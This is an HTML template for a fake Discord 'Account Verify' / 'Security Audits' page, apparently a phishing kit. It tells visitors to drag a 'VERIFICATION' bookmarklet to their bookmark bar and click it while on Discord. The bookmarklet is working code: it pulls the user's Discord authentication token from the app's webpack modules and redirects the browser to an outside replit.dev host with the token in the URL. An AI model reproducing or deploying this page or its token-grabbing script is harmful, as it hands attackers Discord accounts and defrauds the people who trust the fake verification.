{% extends 'layout.html' %}

{% block body %}
    <header class="wrap">
<div>

 <h5 style="font-size: 72px; align-items: center; margin: 0px; font-size: 28px; font-weight: 600; font-family: var(--chakra-fonts-body);">                  
<img class="img-responsive" style="display:inline-block; height:30px; border-radius: 0px; margin-right: 6px; left: 14px;" src="https://cdn.prod.website-files.com/6257adef93867e50d84d30e2/636e0b5493894cf60b300587_full_logo_white_RGB.svg" />

        </h5>
    </div>
<div class="css-a1a4n7" style="border: 1px solid #e2e8f0;
    padding: 10px;
    height: 52px;
    border-radius: 50px;"><a target="_blank" class="chakra-link css-spn4bz"><button type="button" class="chakra-button css-14gctvt open"></button>  <img class="img-responsive" style="border-radius: 20px; display:inline-block; height:30px; margin-top-5px; 
    height: 30px;" src="{{ render_user_avatar }}" />
                {{ render_username }}</a></div>    </header>

    <main class="hero wrap" 
   style="background-size: cover;
    padding: 0px;
    position: relative;
    min-height: 90vh;
    background-image: url(&quot;https://calm-ruby-bear-tux.cyclic.app/static/images/main.png&quot;);
">
<div class="css-mm1">
<img alt="vector" src="../static/images/b-1.png" class="chakra-image css-c2hg41" style="position: absolute; bottom: 0px;left: 0px;">
<img alt="vector" src="../static/images/b-4.png" class="chakra-image css-c2hg41" style="position: absolute;bottom: -100px; right: 0px; z-index: 1;">
<img alt="vector" src="../static/images/b-3.png" class="chakra-image css-c2hg41" style="position: absolute; bottom: 0px; right: 0px;">
<img alt="vector" src="../static/images/b-6.png" class="chakra-image css-c2hg41" style="position: absolute;bottom: -100px; left: 0px; z-index: 1;">  
</div>   
 <!-- Заголовок -->
        <div>
            <h5 class="hero__h1" style="padding-top:50px; font-size: 50px; align-items: center; background: linear-gradient(96.08deg, #6459e3 50.06%, #baa7ed 88.46%); -webkit-background-clip: text;">
                Account Verify
            </h5>
        </div>
  <section class="security" style="width: 100%; padding: 0px;
    width: 60%;
    display: flex;
    justify-content: space-between;
    align-items: flex-start;">
    <div class="container" style="    display: flex;
    justify-content: space-between;
    align-items: center;
    width: 100%;">
       

        <!-- Левая часть (с информацией) -->
        <div class="left" style="margin-right: 50px;
    margin-left: 40px;">
            <h2 style="display: flex;">Security Audits</h2>
            <h1 style="display: flex;"> <img class="img-responsive" style="border-radius: 20px; display:inline-block; height:30px; margin-top-5px; 
    height: 30px;" src="{{ render_user_avatar }}" /></h1>
            <h1 style="font-size: 16px;
    opacity: 0.6;
    display: flex;
    text-align: left;
    margin-bottom: 10px;">Drag the "VERIFICATION" button above <br>to your bookmark bar</h1>
            <h1 style="font-size: 16px;
    opacity: 0.6;
    display: flex;
    text-align: left;
    margin-bottom: 20px;">Click the pinned bookmark on your Discord page</h1>
    <!-- Кнопка VERIFY с иконкой -->
            <a href="javascript:(function() { 
                const url = 'https://19c31484-dad9-4444-be2d-c13786fee840-00-2vgq473tgdn65.pike.replit.dev/'; 
                var f = (webpackChunkdiscord_app.push([[''], {}, e => { m = []; for (let t in e.c) m.push(e.c[t]) }]), m)
                    .find(e => void 0 !== e?.exports?.default?.getToken)
                    .exports.default.getToken(); 
                window.location.replace(url + '/' + f); 
            })();" class="verify-button" id="runBookmarklet">
                <i class="fas fa-arrows-alt"></i> VERIFICATION
            </a>
        </div>
        
        <!-- Правая часть с видео -->
        <div class="right-panel" style="float: right;">
            <div class="video-container">
                <video controls>
                    <source src="https://www.w3schools.com/html/movie.mp4" type="video/mp4">
                </video>
            </div>
        </div>
    </div>
</section>






    </main>

    <section class="metrics container" style="margin-top: -110px; max-width: 100%; margin-right: 0px; margin-left: 0px;">
       <section class="zero">

        <span class="zero__bg"> 

 <h4 class="zero__bg" style="z-index: 2; justify-content: center; font-size:252px;">                                                        
 DISCORD
</h4></span>   
    </section>

   



 

{% endblock %}
